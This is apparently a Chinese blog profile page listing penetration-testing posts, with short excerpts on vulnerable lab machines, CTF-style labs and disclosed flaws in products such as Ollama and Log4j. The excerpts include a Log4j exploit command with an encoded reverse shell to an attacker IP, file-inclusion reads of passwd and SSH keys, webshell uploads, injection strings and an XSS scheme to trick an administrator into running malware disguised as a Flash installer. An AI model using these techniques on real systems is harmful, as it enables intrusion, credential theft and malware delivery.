- 博客(41)
- 收藏
- 关注
原创 OLLAMA 未授权访问-漏洞挖掘
由于Ollama默认未设置身份验证和访问控制功能,未经授权的攻击者可在远程条件下调用Ollama服务接口,执行包括但不限于敏感模型资产窃取、虚假信息投喂、模型计算资源滥用和拒绝服务、系统配置篡改和扩大利用等恶意操作。未设置身份验证和访问控制功能且暴露在公共互联网上的Ollama易受此漏洞攻击影响。这两项措施有助于提升系统的安全性,防止未经授权的访问和攻击。:对公网接口实施双向端口过滤,阻断11434端口的出入站流量。:仅允许11434端口本地访问,并验证端口状态。这样可以有效防止未授权访问。
2025-03-30 21:11:09
570
原创 运输管理系统 GetDataBase-信息泄露漏洞挖掘
郑州时空-TMS运输管理系统 GetDataBase 接口存在信息泄露漏洞,未经身份验证攻击者可通过该漏洞读取系统内部数据库文件,泄露账号密码等重要凭证,导致网站处于极度不安全状态。:管理员应尽快从官方渠道下载并安装最新的补丁包,以修复已知的安全漏洞。:确保所有接口都进行严格的身份验证和权限控制,防止未经授权的访问。
2025-03-30 15:56:17
309
原创 智能路由系统-信息泄露漏洞挖掘
:实施严格的访问控制策略,确保只有经过授权的人员才能访问敏感数据。title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统":确保Secnet安网智能AC管理系统的版本更新到最新,以修复已知的安全漏洞。Secnet-智能路由系统 actpt_5g.data 信息泄露,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。:设置防火墙和入侵检测系统,以防止未经授权的访问和潜在的安全威胁。
2025-03-29 20:25:20
461
原创 FALL靶机渗透攻略
尝试读取passwd文件:http://192.168.40.147/test.php?查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE。尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa。将靶机和Kali都设置为NAT模式。将私钥保存到Kali中,用私钥登录。
2025-03-27 21:04:28
586
原创 NetMizer-日志管理系统-远程命令执行漏洞挖掘
NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行。
2025-03-25 23:44:27
365
原创 MagicFlow-防火墙网关-任意文件读取漏洞
MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件。
2025-03-25 22:26:30
148
原创 Thales靶机攻略
我们用哥斯拉生成一个jsp木马文件并压缩为.zip,修改后缀为war文件,上传。将,ova文件导入VirtualBox中,修改为桥接模式,启动。点击应用程序列表,发现可上传war包。哥斯拉中执行反弹语句。
2025-03-25 20:57:11
244
原创 IIS相关漏洞攻略
当后缀⼩于4时,短⽂件名产⽣需要⽂件(夹)名前缀字符⻓度⼤于等于9位;当后缀⼤于等于4时,⽂件名前缀字符⻓度即使为1,也会产⽣短⽂件名。通过浏览器访问⼀个不存在的短⽂件名,会返回400状态码, 400说明该⽂件不存在。通过两次的提交确认了a是404,b是400 所以存在a⽂件开头的短⽂件。上⾯判断是⽂件,按照a-z进⾏测试,404表示存在,400表示不存在。这时候就可以看到虚拟机已经变卡了。
2025-03-25 00:21:18
397
原创 Shiro框架漏洞攻略
服务端在接收到⼀个Cookie时,会按照如下步骤进⾏解析处理:1.检索RememberMe Cookie的值 2.进⾏Base64解码 3.进⾏AES解码 4.进⾏反序列化操作在第4步中的调⽤反序列化时未进⾏任何过滤,进⽽可以导致出发远程代码执⾏漏洞。
2025-03-24 23:00:06
382
原创 struts2框架漏洞攻略
2.在url处输⼊/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。
2025-03-24 21:54:00
207
原创 jangow-01-1.0.1靶机攻略
按e进入编辑模式 ,将ro 替换为 rw signie init=/bin/bash。最后按shift+?然后输入wq点击回车退出,重启靶场。在系统启动时(⻓按shift键)直到显示以下界⾯。ip a查看网卡信息,修改配置文件网卡信息,回车。发现url中存在参数,尝试写入一句话木马。之后按下Ctrl键+X键,进入如下页面。和Kali一样,设为NAT。虚拟终端写入反弹语句。
2025-03-24 21:08:59
332
原创 Jboss中间件常见漏洞
返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。将反弹shell进⾏base64编码。登录密码admin admin。成功getshell。
2025-03-24 01:45:33
1068
原创 WebLogic中间件常见漏洞
4.首先访问以下 URL http://121.40.229.129:7001/console/css/%252e%252e%252fconsole.portal?进⼊到docker中可以看到命令已经成功运⾏了。
2025-03-24 00:05:20
1176
原创 Tomcat常见漏洞攻略
当在Tomcat的conf(配置⽬录下)/web.xml配置⽂件中添加readonly设置为false时,将导致该漏洞产 生,(需要允许put请求) , 攻击者可以利⽤PUT方法通过精心构造的数据包向存在漏洞的服务器里面上 传 jsp⼀句话文件,从⽽造成远程命令执行,getshell等。
2025-03-23 22:16:08
470
原创 Web-Machine-N7靶机实战攻略
还有一个enter_network没扫出来,添加目录再扫一遍,发现admin.php。抓包添加Cookie: role=admin,得到后半部分flag。修改源码里的localhost为服务器的ip并且提交任意一个文件。访问admin.php ,该接口仅为admin用户。所以flag为{N7KSA_01}得到前半部分flag。Kali设为桥接模式。
2025-03-20 23:53:43
430
原创 Matrix-breakout-2-morpheus靶机实战攻略
发现在graffiti.php输入框输入内容后页面会返回内容,graffiti.txt也有回显。在蚁剑虚拟终端写入反弹代码。
2025-03-19 19:36:23
466
原创 Joker靶机实战攻略
导出密码字典:head -n 100 /usr/share/wordlists/rockyou.txt > test.txt。从Login Form弱密码joomla,joomla登录。发送到intruder模块,设置payload,添加前缀。点击Site Administrator继续弱口令登录。把反弹shell的PHP代码插入到index.php。BP抓包发现登录信息会被base64编码。根据提示应采用爆破登录8080端口网站。取消勾选url编码选项。访问index.php。添加base64编码。
2025-03-18 23:43:08
347
原创 Billu_b0x靶机实战攻略
打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马。尝试登录数据库,登陆成功。查看c.php,发现了疑似数据库用户名密码及库名。将转码复制在 cmd= 后,反弹 shell。可能存在文件包含漏洞。发现用户名密码,尝试登录最初页面,登陆成功。进行url编码,同时打开Kali监听。点击continue,用BP抓包。尝试改用POST传参,包含成功。新建2.asp写入一句话木马。
2025-03-18 19:56:46
241
原创 Log4j2漏洞攻略
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,Ym FzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xODYvNjk2OSAwPiYx}|{base64,-d}|{bash, -i}" -A "攻击者IP"-C后⾯的参数是要执⾏的命令以及编码⽅式,-A后⾯就是对应ip地址。#反弹Shell-base64加密。# VPS防⽕墙开启端⼝。
2025-03-14 19:34:18
484
原创 Hackme靶机攻略
用账号 superadmin密码Uncrackable登录。上传php木马文件,显示上传到uploads目录。当前数据库为webapphacking。破解用户superadmin的密码。访问222.php文件。
2025-03-13 23:52:27
362
原创 文件解析漏洞靶场集锦详解
2. 抓包上传.jpg文件,在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 0x20 修改为0x20 0x00 进⾏发包,上传成功。这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的⽂件,PHP就会向前递归解析。在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg 后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。
2025-03-13 21:30:29
1137
原创 Tomato靶机通关攻略
ssh默认端口为22,但在靶机上是2211。查看源码,发现文件包含漏洞。发现info.php并进入。利用漏洞查看日志文件。
2025-03-12 22:22:12
330
原创 upload-labs-靶场(1-19关)通关攻略
与Pass-17原理一样, 不同的是把php文件改成jpg文件上传,所以在jpg内写上输出木马到目录里面的代码,利用文件包含漏洞一直包含这个文件,只要包含到这个文件,这个jpg文件内的php代码就会被运行,木马文件webshell.php就会生成。最终上传的木马名字是木马.php点,由于文件名末尾的点不符合windows的命名规范,所以上传成功以后只剩下木马.php。所以用BP抓包进行修改。上传能够输出木马文件的木马,然后上传了这个木马会在极短的时间内被删除,我们需要抓包一直爆破这个上传木马的数据包。
2025-03-12 00:25:20
706
原创 XXE靶机通关攻略
对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5先进行base32解码,再进行base64解码。将admin.php复制到base64解码器中解码,导出结果。下载XXE.zip并解压,打开文件夹后双击xxe.ovf。将得到的乱码保存到PHP文件中,放到网站根目录下。发现Flag ,点击获得一个新文件。将得到的数据进行base64解密。nmap扫描 ,获取靶机IP。再将得到的密码进行MD5解码。将数据进行base64解码。
2025-03-10 22:55:30
554
原创 ctfhub-web-SSRF通过攻略
打开附件网站https://lock.cmpxchg8b.com/rebinder.html , 绑定两个回环地址。然后与上面POST请求一样,url编码⼀次把%0A 换成 %0D%0A ,然后再进行第⼆次编码。请求的URL中必须包含http://notfound.ctfhub.com,使用@来绕过即可。将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a ,再次进行url编码。链接已经上传的shell⽊⻢ 在根⽬录发现flag。
2025-03-10 00:11:47
736
原创 Metinfo-csrf漏洞的复现攻略
不保存用BP抓包,点击相关工具,生成CSRF PoC。复制HTML到一个html文件中,放到网站根目录下。这样就利用CSRF漏洞成功修改了管理员的密码。用html文件中修改后的密码登录成功。发现自己一开始的账户密码登录失败。根据提示填写信息,保存继续。根据指示填写,保存管理设置。输入之前设置的账户密码登录。点击编辑,修改登陆密码。安装完毕,点击管理网站。
2025-03-06 20:47:42
286
原创 用XSS制作flash钓鱼程序黑入Windows电脑
为了以假乱真,我们将文件地址和文件名改成我们的flashcenter_pp_ax_install_cn.exe,flashcenter_pp_ax_install_cn.exe是我们要让管理员下载运行的病毒文件。设置解压后运行什么程序,首先运行正常的flash安装程序,再然后运行我们的病毒。管理员在后台页面执行了我们发过去的引用外部文件的script代码。然后点击高级-自解压选项,写所有windows都有的一个目录。选中正常的flash安装程序和病毒,然后点击添加到压缩。
2025-03-05 23:07:23
529
原创 sqli-labs靶场1-4通关攻略
id=1 or 1=1--+(页面正常,可能是数字型注入)?id=1 and 1=2--+ (把数字型逻辑性判断改成错的,页面正常,则不是数字型注入)?id=1' or 1=1--+(页面正常,可能是字符型注入)?id=1' and 1=2--+(把字符型逻辑判断改错,页面异常,则是字符型注入)
2025-02-26 21:52:24
852
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人